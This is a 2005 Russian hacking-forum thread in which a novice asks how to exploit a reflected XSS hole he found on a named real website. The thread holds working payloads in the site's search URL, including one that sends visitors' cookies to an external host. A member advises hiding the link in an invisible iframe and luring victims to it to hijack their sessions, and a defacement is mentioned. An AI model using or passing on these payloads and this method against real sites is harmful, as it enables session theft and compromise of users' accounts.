Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Нашел дыру, но не знаю че делать дальше - помогите новичку :) |
15.06.2005, 12:08
|
|
Новичок
Регистрация: 14.06.2005
Сообщений: 2
Провел на форуме:
7179
Репутация:
0
|
|
Нашел дыру, но не знаю че делать дальше - помогите новичку :)
Привет всем, я нашел дыру вот тут -
1. http://wow.crpg.ru/search.php
если сделать так:
http://wow.crpg.ru/search.php?query=></td></tr></form></table><script>alert(document.cookie);</script
то вроде все получается, однако это же нечеловечно, хотелось бы поцивелизованнее чтоли... в общем не знаю как и что еще можно оттуда извлечь...
2. а еще там же дыра -
http://wow.crpg.ru/printfeature.php?artid=
если ввести после равно qwerty то выпадает в ошибку базы. Как можно провести хацк?  |
|
|
15.06.2005, 12:57
|
|
Участник форума
Регистрация: 26.12.2004
Сообщений: 188
Провел на форуме:
1495357
Репутация:
107
|
|
1 Можно украсть куки.
2 Это по ходу не дыра.. А ошибка в скрипте.
|
|
|
|
15.06.2005, 13:34
|
|
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814
Репутация:
3876
|
|
Угу, второй случай - просто обработка этого qwerty и иже с ними неправильна. Вот скрипт и ругается. Посмотрел бы сам вначале, чем тревогу бить.. видно же что кроме пути к файлу, здесь больше ничё не выцепишь.
А по 1 случаю. ХЗ. помоему хрен что сделаешь)). Хотя я не смотрел, признаюсь).
|
|
|
|
15.06.2005, 13:34
|
|
Новичок
Регистрация: 14.06.2005
Сообщений: 2
Провел на форуме:
7179
Репутация:
0
|
|
Сообщение от FoX's
1 Можно украсть куки.
Тык как цивилизованно украсть то? не пошлешь же ссылку вида
http://wow.crpg.ru/search.php?query=></td></tr></form></table><script>img = new Image(); img.src =<a href="http://antichat.ru/cgi-bin/s.jpg">+document.cookie;</script>
Как-бы ее запрятать так, чтоб явно не торчала...
|
|
|
|
15.06.2005, 13:45
|
|
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233
Репутация:
2726
|
|
А ошибка в скрипте - не дыра? ))
|
|
|
|
15.06.2005, 13:48
|
|
Участник форума
Регистрация: 26.12.2004
Сообщений: 188
Провел на форуме:
1495357
Репутация:
107
|
|
нет...
|
|
|
|
15.06.2005, 13:48
|
|
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464
Репутация:
42
|
|
КЕЗ не всегда.
"))))"
|
|
|
|
15.06.2005, 13:53
|
|
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233
Репутация:
2726
|
|
нет, конечно если там написано
fopem вместо fopen то да, это вообще ничего работать небудет,
но в данном случае это и ест дыра
|
|
|
|
15.06.2005, 14:09
|
|
Новичок
Регистрация: 14.06.2005
Сообщений: 2
Провел на форуме:
7179
Репутация:
0
|
|
Ближе к теме, мальчики и девочки 
с похожей ссылкой удалось сделать дефейс сменой картинки бекграунда, но опять же увидишь, только если полностью набить адрес+код в експлорере... |
|
|
|
15.06.2005, 17:21
|
|
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258
Репутация:
648
|
|
Тык как цивилизованно украсть то?
Сначала выясни - что хранится в куках. Если там есть пасс (хэш пасса), то просто создаешь страницу с нулевым (невидимым фреймом) где ссылка на этот фрейм будет та которую ты нашел. И после всего этого пишешь или по личке или еще кому-нить - так мол и так. Гляньте на страницу (чтобы глянули - прояви фантазию).
p.s. только сначала проверь чтобы все фурычило, иногда неполучится куку перхватить
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
